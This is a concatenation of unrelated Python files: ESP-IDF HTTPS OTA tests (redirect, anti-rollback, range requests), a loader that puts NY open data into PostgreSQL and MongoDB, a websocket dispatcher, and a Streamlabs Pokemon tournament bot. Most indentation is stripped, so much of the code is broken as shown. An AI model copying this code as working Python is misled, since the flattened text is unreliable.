binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
chunked_server = start_chunked_server(dut1.app.binary_path, 8070)
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':8070/' + bin_name))
dut1.write('https://' + host_ip + ':8070/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
chunked_server.kill()
os.remove(os.path.join(dut1.app.binary_path, 'server_cert.pem'))
os.remove(os.path.join(dut1.app.binary_path, 'server_key.pem'))
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_advanced_https_ota_example_redirect_url(env, extra_data):
"""
    This is a positive test case, which starts a server and a redirection server.
    The redirection server redirects the HTTP request to a different port.
    The number of iterations can be specified in the variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
    # Port to which the request should be redirected
redirection_server_port = 8081
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
thread2 = Thread(target=start_redirect_server, args=(dut1.app.binary_path, host_ip, redirection_server_port, server_port))
thread2.daemon = True
thread2.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
    # The HTTPS server and redirect server threads are daemon threads, so they do not need to be shut down explicitly.
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(redirection_server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(redirection_server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
dut1.reset()
@ttfw_idf.idf_example_test(env_tag='Example_8Mflash_Ethernet')
def test_examples_protocol_advanced_https_ota_example_anti_rollback(env, extra_data):
"""
    Working of OTA when anti_rollback is enabled and the security version of the new image is lower than the current one.
    The application should return with an error message in this case.
steps: |
1. join AP
2. Generate binary file with lower security version
3. Fetch OTA image over HTTPS
4. Check working of anti_rollback feature
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT, app_config_name='anti_rollback')
server_port = 8001
# Original binary file generated after compilation
bin_name = 'advanced_https_ota.bin'
# Modified firmware image to lower security version in its header. This is to enable negative test case
anti_rollback_bin_name = 'advanced_https_ota_lower_sec_version.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
file_size = os.path.getsize(binary_file)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, anti_rollback_bin_name), 'wb+')
fo.write(f.read(file_size))
# Change security_version to 0 for negative test case
fo.seek(36)
fo.write(b'\x00')
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, anti_rollback_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
# Positive Case
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' eth ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
# Use originally generated image with secure_version=1
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect(re.compile(r' eth ip: ([^,]+),'), timeout=30)
    dut1.expect('App is valid, rollback cancelled successfully', timeout=30)
# Negative Case
dut1.expect('Starting Advanced OTA example', timeout=30)
# Use modified image with secure_version=0
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + anti_rollback_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + anti_rollback_bin_name)
dut1.expect('New firmware security version is less than eFuse programmed, 0 < 1', timeout=30)
    os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_advanced_https_ota_example_partial_request(env, extra_data):
"""
This is a positive test case, to test OTA workflow with Range HTTP header.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT, app_config_name='partial_download')
server_port = 8001
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
http_requests = int((bin_size / 50000) + 1)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
Utility.console_log('ENV_TEST_FAILURE: Cannot connect to AP')
raise
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
for _ in range(http_requests):
dut1.expect('Connection closed', timeout=60)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
dut1.reset()
if __name__ == '__main__':
test_examples_protocol_advanced_https_ota_example()
test_examples_protocol_advanced_https_ota_example_chunked()
test_examples_protocol_advanced_https_ota_example_redirect_url()
test_examples_protocol_advanced_https_ota_example_truncated_bin()
test_examples_protocol_advanced_https_ota_example_truncated_header()
test_examples_protocol_advanced_https_ota_example_random()
test_examples_protocol_advanced_https_ota_example_anti_rollback()
test_examples_protocol_advanced_https_ota_example_partial_request()
|
test_load.py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 2 21:20:40 2019
@author: GaurangPrasadML
"""
import psycopg2
from sqlalchemy import create_engine
import pandas as pd
import threading
import pymongo
import json
conn = psycopg2.connect("host=localhost dbname=test5 user=test5 password=test5")
print("Connected to PSQL")
# print(df.columns)
def loadFoodServices():
df = pd.read_csv("./testingcsv.csv")
cur = conn.cursor()
engine = create_engine('postgresql+psycopg2://test5:test5@localhost/test5')
# Food Service Violations
print("Loading Food Service Violations")
df1 = df[['VIOLATION ITEM', 'VIOLATION DESCRIPTION']]
df_distinct = df1.drop_duplicates(keep="first", inplace=False)
    df_distinct = df_distinct.dropna()
df_distinct.columns = ['violation_item', 'violation_description']
df_distinct.to_sql('food_service_violations', engine, schema='public',index=False, if_exists='append')
# Health Dept County Map
print("Loading Health Dept to County Map")
healthMap = df[['COUNTY', 'LOCAL HEALTH DEPARTMENT']]
healthMap = healthMap.drop_duplicates(keep="first", inplace=False)
    healthMap = healthMap.dropna()
healthMap.columns = ['county', 'local_health_department']
healthMap.to_sql('health_dept_county_map', engine, schema='public',index=False, if_exists='append')
# Food Service Operators
print("Loading Food Service Operators")
df3 = df[['NYS HEALTH OPERATION ID', 'OPERATION NAME', 'LATITUDE', 'LONGITUDE', 'FACILITY CODE', 'FACILITY ADDRESS', 'FACILITY MUNICIPALITY',
'FACILITY CITY', 'FACILITY POSTAL ZIPCODE', 'FS FACILITY STATE', 'PERMITTED DBA', 'PERMITTED CORP. NAME', 'PERM. OPERATOR LAST NAME',
'PERM. OPERATOR FIRST NAME', 'FOOD SERVICE TYPE', 'FOOD SERVICE DESCRIPTION', 'PERMIT EXPIRATION DATE']]
df3_distinct = df3.drop_duplicates(subset='NYS HEALTH OPERATION ID', keep="first", inplace=False)
df3_distinct.columns = ['nys_health_operation_id', 'operation_name','latitude','longitude',
'facility_code','facility_address','facility_municipality','facility_city','facility_postal_zipcode',
'fs_facility_state','permitted_dba','permitted_corp_name','perm_operator_last_name','perm_operator_first_name',
'food_service_type','food_service_description','permit_expiration_date']
df3_distinct.to_sql('food_service_operator', engine,schema='public',index=False, if_exists='append')
# Food Service Inspections
print("Loading Food Service Inspections")
df4 = df[['COUNTY','DATE OF INSPECTION','NYS HEALTH OPERATION ID','VIOLATION ITEM',
'CRITICAL VIOLATION','TOTAL # CRITICAL VIOLATIONS','TOTAL #CRIT. NOT CORRECTED',
'TOTAL # NONCRITICAL VIOLATIONS', 'NYSDOH GAZETTEER 1980', 'INSPECTION TYPE',
'INSPECTION COMMENTS']]
df4 = df4.dropna(how='any',axis=0)
df4.columns = ['county','date_of_inspection','nys_health_operation_id',
'violation_item','critical_violation','total_critical_violations','total_crit_not_corrected',
'total_noncritical_violations','nysdoh_gazetteer_1980','inspection_type','inspection_comments']
df4_distinct = df4.drop_duplicates(subset=['nys_health_operation_id','date_of_inspection','violation_item'], keep="first", inplace=False)
df4_distinct.to_sql('food_service_inspections', engine,schema='public',index=False, if_exists='append')
conn.commit()
print("Done")
def loadAdultArrests():
df = pd.read_csv("./Adult_Arrests_by_County___Beginning_1970.csv")
cur = conn.cursor()
engine = create_engine('postgresql+psycopg2://test5:test5@localhost/test5')
# Food Service Violations
print("Loading Main Table")
df1 = df[['County','Year','Drug Felony','Violent Felony','DWI Felony','Other Felony','Drug Misd','DWI Misd','Property Misd','Other Misd']]
df_distinct = df1.drop_duplicates(keep="first", inplace=False)
df_distinct = df_distinct.dropna(how='any',axis=0)
df_distinct.columns = ['county','year','drug_felony','violent_felony','dwi_felony','other_felony','drug_misdemeanor','dwi_misdemeanor',
'property_misdemeanor','other_misdemeanor']
df_distinct.to_sql('adult_arrests', engine, schema='public',index=False, if_exists='append')
conn.commit()
print("Done")
def loadLiquorDataset():
df = pd.read_csv("./Liquor_Authority_Quarterly_List_of_Active_Licenses.csv", low_memory = False)
cur = conn.cursor()
engine = create_engine('postgresql+psycopg2://test5:test5@localhost/test5')
# city_zip_map Violations
print("Loading Liquor Table")
df1 = df[['Zip','City','State']]
df1.columns = ['zip','city','state']
result_df = df1.drop_duplicates(subset=['zip'])
result_df.to_sql('city_zip_map', engine, schema='public',index=False, if_exists='append')
#LIQUOR_AGENCY
print("Loading Liquor Agency")
df2 = df[['Agency Zone Office Number','Agency Zone Office Name']]
df2.columns = ['office_number','office_name']
df2_unique = df2.drop_duplicates(subset=['office_number'])
df2_unique.to_sql('liquor_agency', engine, schema='public',index=False, if_exists='append')
conn.commit()
#LIQUOR_LICENSE
print("Loading License Type")
df3 = df[['License Type Code','License Class Code','License Type Name']]
df3.columns = ['license_type_code','license_class_code','license_type_name']
df3_unique = df3.drop_duplicates(subset=['license_type_code'])
df3_unique.to_sql('license_types', engine, schema='public',index=False, if_exists='append')
conn.commit()
#LIQUOR_LICENSE
print("Loading Liquor License")
df4 = df[['County Name (Licensee)','License Serial Number','License Type Code','Premises Name','Doing Business As (DBA)','Actual Address of Premises (Address1)',
'Zip','Latitude','Longitude','License Original Issue Date','License Effective Date','License Expiration Date','License Certificate Number']]
df4.columns = ['county','license_serial_no','license_type_code','premise_name','doing_business_as','address','zipcode',
'latitude','longitude','issue_date','effective_date','expiration_date','license_certificate_number']
df4_unique = df4.drop_duplicates(subset=['license_serial_no'])
df4_unique.to_sql('liquor_license', engine, schema='public',index=False, if_exists='append')
conn.commit()
print("Done")
def loadNoSQLData():
myclient = pymongo.MongoClient("mongodb://localhost:27017/")
mydb = myclient["dbms"]
mycol = mydb["insuranceBeneficiaries"]
with open('unemploymentBenefits.json','r') as data_file:
data_json = json.load(data_file)
#Insert Data
    # remove()/insert() are the legacy PyMongo 2.x APIs; newer PyMongo versions use delete_many({}) and insert_many()/insert_one()
    mycol.remove()
    mycol.insert(data_json)
# Load each dataset on its own thread
liquorDataset = threading.Thread(target=loadLiquorDataset)
arrestDataset = threading.Thread(target=loadAdultArrests)
foodServiceDataset = threading.Thread(target=loadFoodServices)
insuranceDataset = threading.Thread(target=loadNoSQLData)
liquorDataset.start()
arrestDataset.start()
foodServiceDataset.start()
insuranceDataset.start()
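# Optional sketch (not part of the original script): block until every loader thread
# has finished so the process only exits after all datasets are loaded.
for loader in (liquorDataset, arrestDataset, foodServiceDataset, insuranceDataset):
    loader.join()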
|
dispatcher.py
|
import logging
import os
import socket
import time
import typing as T
from threading import Thread
from traceback import format_exc
import stopit
import websocket
from rembrain_robot_framework.ws import WsCommandType, WsRequest
class WsDispatcher:
CONNECTION_RETRIES = 3
def __init__(self, propagate_log=True, proc_name=""):
"""
:param propagate_log: whether to propagate the logs to the root logger
if False, then a separate logger is created that just writes to the stderr
"""
self.ws: T.Optional[websocket.WebSocket] = None
self._reader: T.Optional[Thread] = None
self.log = self._get_logger(propagate_log, proc_name)
def open(self) -> None:
if not self.ws or not self.ws.connected:
self.log.info("Opening websocket connection")
# Turn on SO_REUSEADDR so we can reuse hung sockets
for i in range(self.CONNECTION_RETRIES):
with stopit.ThreadingTimeout(0.5):
self.ws = websocket.WebSocket(sockopt=((socket.SOL_SOCKET, socket.SO_REUSEADDR, 1),))
self.ws.connect(os.environ["WEBSOCKET_GATE_URL"])
break
else:
err_msg = f"Method 'websocket.connect()' failed to connect after {self.CONNECTION_RETRIES} retries"
self.log.error(err_msg)
raise Exception(err_msg)
# todo remove it ?
self.ws.settimeout(10.0)
self._end_silent_reader()
def close(self) -> None:
try:
if self.ws:
self.log.info("Closing websocket connection")
self.ws.close()
except Exception:
self.log.error(f"WsDispatcher: ws close failed. Reason: {format_exc()}.")
self.ws = None
self._end_silent_reader()
def pull(self, request: WsRequest) -> T.Generator[T.Union[str, bytes], None, None]:
"""
Open socket, send 'PULL' command to websocket and receive data constantly.
:param request - request body
:return: generator with response data
"""
while True:
try:
self.open()
self.ws.send(request.json())
while True:
if not self.ws.connected:
break
response: T.Union[str, bytes] = self.ws.recv()
if isinstance(response, bytes) or (isinstance(response, str) and response != WsCommandType.PING):
yield response
except Exception:
err_msg = f"WsDispatcher ERROR: SEND '{WsCommandType.PULL}' command failed. Reason: {format_exc()}."
self.log.error(err_msg)
time.sleep(5)
self.close()
# todo refactor params
def push(
self, request: WsRequest, retry_times: T.Optional[int] = None, delay: T.Optional[int] = None
) -> T.Optional[T.Union[str, bytes]]:
"""
Open socket and send 'PUSH' command to websocket.
:param request - request body
:param retry_times - repeats, if retry_times is None => infinite generator
:param delay - (optional) sleep interval in seconds if it needs
:return: ws response
"""
repeats: T.Iterator = iter(int, 1) if retry_times is None else range(retry_times)
for _ in repeats:
try:
self.open()
self.ws.send(request.json())
return self.ws.recv()
except socket.error:
self.close()
if retry_times is None:
time.sleep(5.0)
except Exception:
self.log.error(f"WsDispatcher: Send '{WsCommandType.PUSH}' command failed. Reason: {format_exc()}.")
self.close()
# todo try to remove this code
if delay:
time.sleep(delay)
def push_loop(
self, request: WsRequest, data: T.Union[str, bytes] = b""
) -> T.Generator[T.Union[str, bytes], bytes, None]:
"""
Open socket, send 'PUSH' command to websocket with auth data and then send data constantly.
:param request - request body
:param data - bytes/str data for request
:return: ws response
"""
while True:
try:
self.open()
self.ws.send(request.json())
self.ws.recv()
# todo does it need ?
self.ws.settimeout(1.0)
self._start_silent_reader()
while True:
if not data:
data = yield # for first query (for next())
if isinstance(data, bytes):
self.ws.send_binary(data)
data = yield
elif isinstance(data, str):
self.ws.send(data)
data = yield
else:
err_msg = (
f"Data type {type(data)} is invalid. "
f"You can only send either binary data, or string messages."
)
self.log.error(err_msg)
raise Exception(err_msg)
except Exception:
err_msg = f"WsDispatcher: Send '{WsCommandType.PUSH_LOOP}' command failed. Reason: {format_exc()}."
self.log.error(err_msg)
self.close()
time.sleep(2.0)
def _start_silent_reader(self) -> None:
self._reader = Thread(target=self._silent_recv, daemon=True)
self._stop_reader = False
self._reader.start()
def _end_silent_reader(self) -> None:
if self._reader:
self._stop_reader = True
self._reader.join()
self._reader = None
def _silent_recv(self) -> None:
while not self._stop_reader:
time.sleep(0.01)
try:
self.ws.recv()
            except Exception:  # ignore receive errors; this reader only drains the socket
pass
@staticmethod
def _get_logger(propagate: bool, proc_name: str) -> logging.Logger:
"""
Since WsDispatcher is used inside the websocket logger (See LogHandler class in `logger/handler.py`),
we need to make sure we don't accidentally have an error loop where it breaks inside the logging framework.
So to handle that, we turn off propagation to the root logger and create a simple StreamHandler logger.
"""
pid = os.getpid()
logger = logging.getLogger(f"{__name__} ({proc_name}:{pid})")
logger.propagate = propagate
# If this is not a propagating logger, then set it up with just a StreamHandler
if not propagate:
logger.setLevel(logging.INFO)
for handler in logger.handlers:
logger.removeHandler(handler)
handler = logging.StreamHandler()
formatter = logging.Formatter("%(levelname)s:%(name)s:%(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger
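# Minimal usage sketch (not part of the original module): `request` is assumed to be
# a WsRequest built by the caller; its exact fields are defined in
# rembrain_robot_framework.ws and are not shown here. The helper illustrates the
# generator protocol of push_loop(): prime the generator with next(), then feed
# payloads with send().
def stream_frames(dispatcher: WsDispatcher, request: WsRequest, frames: T.Iterable[T.Union[str, bytes]]) -> None:
    sender = dispatcher.push_loop(request)
    next(sender)  # advances to the first `yield`, i.e. connects, authenticates and starts the silent reader
    for frame in frames:
        sender.send(frame)  # bytes are sent as binary frames, str as text messages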
|
PokemonTournament_StreamlabsSystem.py
|
#---------------------------------------
# Import Libraries
#---------------------------------------
import clr
import sys
import json
import os
import random
import ctypes
import threading
import time
import codecs
from datetime import datetime
from datetime import timedelta
#---------------------------------------
# [Required] Script Information
#---------------------------------------
debuggingMode = False
ScriptName = "Tournament - Pokemon"
Website = "https://twitter.com/Felreach"
Description = "Tournament - Pokemon"
Creator = "Felreach"
Version = "1.0.6"
#---------------------------------------
# Classes
#---------------------------------------
class Fighter:
    def __init__(self, twitchname=None, type=None, winnings=0):
        self.name = twitchname
        self.deckType = type
        self.currentWinnings = winnings
        return
class Match:
def __init__(self,childMatch1, childMatch2, depth):
self.previousMatchTop = childMatch1 # stored as ID
self.previousMatchBot = childMatch2 # stored as ID
self.nextMatch = None
self.trainerTop = None
self.trainerBot = None
self.winner = None
self.loser = None
self.remainingProgression = 1
self.hasProgressed = False
self.depth = depth
return
#---------------------------------------
# Set Variables
#---------------------------------------
configFile = "TournamentConfig.json"
settings = {}
user = ""
RandomInstance = random.SystemRandom()
randomNames = ["Salty", "Monday", "Briana", "Blossom", "Lucilla", "Dorris", "Elia", "Lisbeth", "Esther", "Angila", "Roger", "Particia", "Lilia", "Tabetha", "Leopoldo", "Lanny", "Elene", "Anton", "Demetrius", "Von", "Raymond", "Amie", "Sharlene", "Vickey", "Kandace", "Darrel", "Jayson", "Bonita", "Nicolette", "Mendy", "Carson", "Ouida"]
tickCounter = 0
#tournament data
stadiumLocked = False
tournamentOpened = False
tournamentStarted = False
tournamentReady = True
enteredTrainers = []
allTrainers = []
allMatches = []
tournamentDepth = -1
currentProgressionDepth = -1
startBracket = []
currentTick = ""
#announcement
lastAnnouncementTime = datetime.now()
#command params
cmdParamListTypes = {"types", "listtypes"}
cmdParamReadyTourny = {"prepare", "readyup"}
cmdParamStartTourny = {"start"}
cmdParamLockTourny = {"lock"}
cmdParamListTrainers = {"trainers", "users"}
#battle defs
TYPES = ["normal", "fighting", "flying", "poison", "ground", "rock", "bug", "ghost", "steel", "fire", "water", "grass", "electric", "psychic", "ice", "dragon", "dark", "fairy"]
INEFFECTIVE_AGAINST = { "normal" : {"ghost"}, "fighting" : {"ghost"}, "poison" : {"steel"}, "ground" : {"flying"}, "ghost" : {"normal"}, "electric" : {"ground"}, "psychic" : {"dark"}, "dragon" : {"fairy"}}
WEAK_AGAINST = { "normal" : {"rock", "steel"}, "fighting" : {"flying", "poison", "bug", "psychic", "fairy"}, "flying": {"rock", "steel", "electric"}, "poison" : {"poison", "ground", "rock", "ghost"}, "ground" : {"bug", "grass"}, "rock" : {"fighting", "ground", "steel"}, "bug": {"fighting", "flying", "poison", "ghost", "steel", "fire", "fairy"}, "ghost" : {"dark"}, "steel" : {"steel", "fire", "water", "electric"}, "fire" : {"rock", "fire", "water", "dragon"}, "water" : {"water", "grass", "dragon"}, "grass" : {"flying", "poison", "bug", "steel", "fire", "grass", "dragon"}, "electric" : {"grass", "electric", "dragon"}, "psychic" : {"steel", "psychic"}, "ice" : {"steel", "fire", "water", "ice"}, "dragon" : {"steel"}, "dark" : {"fighting", "dark", "fairy"}, "fairy" : {"poison", "steel", "fire"}}
STRONG_AGAINST = { "fighting" : {"normal", "rock", "steel", "ice", "dark"}, "flying" : {"fighting", "bug", "grass"}, "poison": {"grass"}, "ground" : {"poison", "rock", "steel", "fire", "electric"}, "rock" : {"flying", "bug", "fire", "ice"}, "bug" :{"grass", "psychic", "dark"}, "ghost" : {"ghost", "psychic"}, "steel" : {"rock", "ice", "fairy"}, "fire" : {"bug", "steel", "grass", "ice"}, "water": {"ground", "rock", "fire"}, "grass" : {"ground", "rock", "water"}, "electric" : {"flying", "water"}, "psychic" : {"fighting", "poison"}, "ice" : {"flying", "ground", "grass", "dragon"}, "dragon" : {"dragon"}, "dark" : {"ghost", "psychic"}, "fairy" : {"fighting", "dragon", "dark"}}
ineffectiveStrength = 20.0
weakStrength = 40.0
evenStrength = 50.0
strongStrength = 70.0
#threads
threadsKeepAlive = True
entranceLockTimerThreadActive = False
startPauseTimerThreadActive = False
tournamentTimerThreadActive = False
cooldownTimerThreadActive = False
#---------------------------------------
# Def functions
#---------------------------------------
def RepresentsInt(s):
try:
int(s)
return True
except ValueError:
return False
def GetBattleDuration(ours, against, isFinals = False):
if ours == None or against == None:
return 1
result1 = GetStrength(ours, against)
result2 = GetStrength(against, ours)
r = 1
if result1 == "strong":
if result2 == "strong":
r = 1
elif result2 == "even":
r = 1
elif result2 == "weak":
r = 1
elif result2 == "ineffective":
r = 1
if result1 == "even":
if result2 == "strong":
r = 1
elif result2 == "even":
r = 2
elif result2 == "weak":
r = 2
elif result2 == "ineffective":
r = 2
if result1 == "weak":
if result2 == "strong":
r = 1
elif result2 == "even":
r = 2
elif result2 == "weak":
r = 3
elif result2 == "ineffective":
r = 4
if result1 == "ineffective":
if result2 == "strong":
r = 1
elif result2 == "even":
r = 2
elif result2 == "weak":
r = 4
elif result2 == "ineffective":
r = 5
if isFinals == True:
r = max(4, 2 * r)
return r
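# Worked example (derived from the type tables above): for "water" vs "water" both
# directions resolve to "weak" (WEAK_AGAINST["water"] contains "water"), giving a
# battle duration of r = 3; for "fire" vs "grass" the forward matchup is "strong",
# so r = 1 regardless of the reverse matchup.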
def GetStrength(ours, against):
if(ours in TYPES):
if(against in TYPES):
if(STRONG_AGAINST.has_key(ours)):
if(against in STRONG_AGAINST[ours]):
return "strong"
if(WEAK_AGAINST.has_key(ours)):
if(against in WEAK_AGAINST[ours]):
return "weak"
if(INEFFECTIVE_AGAINST.has_key(ours)):
if(against in INEFFECTIVE_AGAINST[ours]):
return "ineffective"
return "even"
def GetStrengthValue(ours, against):
if(ours in TYPES):
if(against in TYPES):
if(STRONG_AGAINST.has_key(ours)):
if(against in STRONG_AGAINST[ours]):
return strongStrength
if(WEAK_AGAINST.has_key(ours)):
if(against in WEAK_AGAINST[ours]):
return weakStrength
if(INEFFECTIVE_AGAINST.has_key(ours)):
if(against in INEFFECTIVE_AGAINST[ours]):
return ineffectiveStrength
return evenStrength
def Battle(first, second):
result = {"winner" : None, "loser" : None}
if(first in TYPES):
if(second in TYPES):
strength1 = GetStrengthValue(first, second)
strength2 = GetStrengthValue(second, first)
toWin = strength1 / (strength1 + strength2)
if( RandomInstance.random() < toWin ):
result["winner"] = "first"
else :
result["winner"] = "second"
else:
result["winner"] = "first"
else:
if(second in TYPES):
result["winner"] = "second"
    if result["winner"] == "first":
        result["loser"] = "second"
    elif result["winner"] == "second":
        result["loser"] = "first"
return result
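# Worked example (using the strength values defined above; Init() may override them
# from the settings): Battle("fire", "grass") uses strength1 = strongStrength = 70.0
# and strength2 = weakStrength = 40.0, so the first trainer wins with probability
# 70 / (70 + 40), roughly 0.64; two identical types always come down to an even 50/50 roll.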
def ResolveBattle(battleToResolve):
# mark progressed
battleToResolve.hasProgressed = True
    # quick resolve because there isn't an opponent
if battleToResolve.trainerTop != None and battleToResolve.trainerBot == None:
battleToResolve.winner = battleToResolve.trainerTop
battleToResolve.loser = None
return battleToResolve
    # quick resolve because there isn't an opponent
if battleToResolve.trainerTop == None and battleToResolve.trainerBot != None:
battleToResolve.winner = battleToResolve.trainerBot
battleToResolve.loser = None
return battleToResolve
if battleToResolve.trainerTop == None and battleToResolve.trainerBot == None:
battleToResolve.winner = None
battleToResolve.loser = None
return battleToResolve
if battleToResolve.remainingProgression > 0:
return battleToResolve
# get types
typeA = allTrainers[battleToResolve.trainerTop].deckType
typeB = allTrainers[battleToResolve.trainerBot].deckType
result = Battle(typeA, typeB)
if result["winner"] == "first":
battleToResolve.winner = battleToResolve.trainerTop
battleToResolve.loser = battleToResolve.trainerBot
else:
battleToResolve.winner = battleToResolve.trainerBot
battleToResolve.loser = battleToResolve.trainerTop
allTrainers[battleToResolve.winner].currentWinnings += settings["PrizePerBattle"]
return battleToResolve
def InitBracket():
global RandomInstance
global startBracket, allMatches, tournamentDepth, currentProgressionDepth
startBracket = []
allMatches = []
enteredCount = len(enteredTrainers)
if enteredCount <= 0:
return
# count up the leafs in the tournament tree
startCount = 2
tournamentDepth = 0
while startCount < enteredCount:
startCount *= 2
tournamentDepth += 1
currentProgressionDepth = tournamentDepth + 1 # set current finished depth
Debug("start count, entered count:" + str(startCount) + "," + str(enteredCount))
    #init the brackets
startBracket = range(enteredCount) # map out the trainer IDs
if startCount - enteredCount != 0:
c = (startCount - enteredCount)
n =[ None ] * c
startBracket.extend(n)
RandomInstance.shuffle(startBracket)
Debug("filling matches:")
#fill matches
parentDictionary = {1 : 0, 2: 0}
d = 0
index = 0
if d != tournamentDepth:
allMatches.append(Match(childMatch1 = (index * 2+1), childMatch2 = (index * 2+2), depth = d))
else:
allMatches.append(Match(childMatch1 = None, childMatch2 = None, depth=d))
while d < tournamentDepth:
d += 1
for x in range(2**d):
index += 1
if d != tournamentDepth:
allMatches.append(Match(childMatch1 = index * 2+1, childMatch2 = index * 2+2, depth = d))
parentDictionary[index * 2+1] = index
parentDictionary[index * 2+2] = index
else:
allMatches.append(Match(childMatch1 = None, childMatch2 = None, depth = d))
Debug("filling parents:")
# fill parents
index = 0
while index < len(allMatches):
if index in parentDictionary:
allMatches[index].nextMatch = parentDictionary[index]
index += 1
Debug("filling lowest depth matches with participants:")
# fill the participants of all the matches at the lowest depth
start = len(allMatches) - startCount/2 #figure out where the last matches start (the tournament matches are stored as a binary heap in an array)
index = 0
for x in range(start, len(allMatches)):
#x = start + y
Debug("x: "+ str(x))
allMatches[x].trainerTop = startBracket[index]
allMatches[x].trainerBot = startBracket[index+1]
# update battle duration
type1 = None
type2 = None
if allMatches[x].trainerTop != None:
type1 = allTrainers[allMatches[x].trainerTop].deckType
if allMatches[x].trainerBot != None:
type2 = allTrainers[allMatches[x].trainerBot].deckType
allMatches[x].remainingProgression = GetBattleDuration(type1, type2)
index += 2
if len(enteredTrainers) <= 2 and len(enteredTrainers) > 0:
allMatches[0].remainingProgression = GetBattleDuration(type1, type2, True)
return
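# Illustration of the layout built above (assuming 3 entered trainers): startCount
# becomes 4 and tournamentDepth becomes 1, so allMatches holds three Match objects
# stored heap-style: allMatches[0] is the final (depth 0) and allMatches[1] /
# allMatches[2] are its child matches (depth 1), which receive the shuffled trainer
# IDs [0, 1, 2, None] two at a time.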
def advanceWinner(currentMatch):
global allMatches
next = allMatches[currentMatch].nextMatch
if next != None:
if currentMatch == allMatches[next].previousMatchTop:
allMatches[next].trainerTop = allMatches[currentMatch].winner
if currentMatch == allMatches[next].previousMatchBot:
allMatches[next].trainerBot = allMatches[currentMatch].winner
allMatches[next].remainingProgression = 1
if allMatches[next].trainerTop != None and allMatches[next].trainerBot != None:
type1 = allTrainers[allMatches[next].trainerTop].deckType
type2 = allTrainers[allMatches[next].trainerBot].deckType
if next == 0: # we are going into finals, use longer duration
allMatches[next].remainingProgression = GetBattleDuration(type1, type2, True)
else:
allMatches[next].remainingProgression = GetBattleDuration(type1, type2)
return
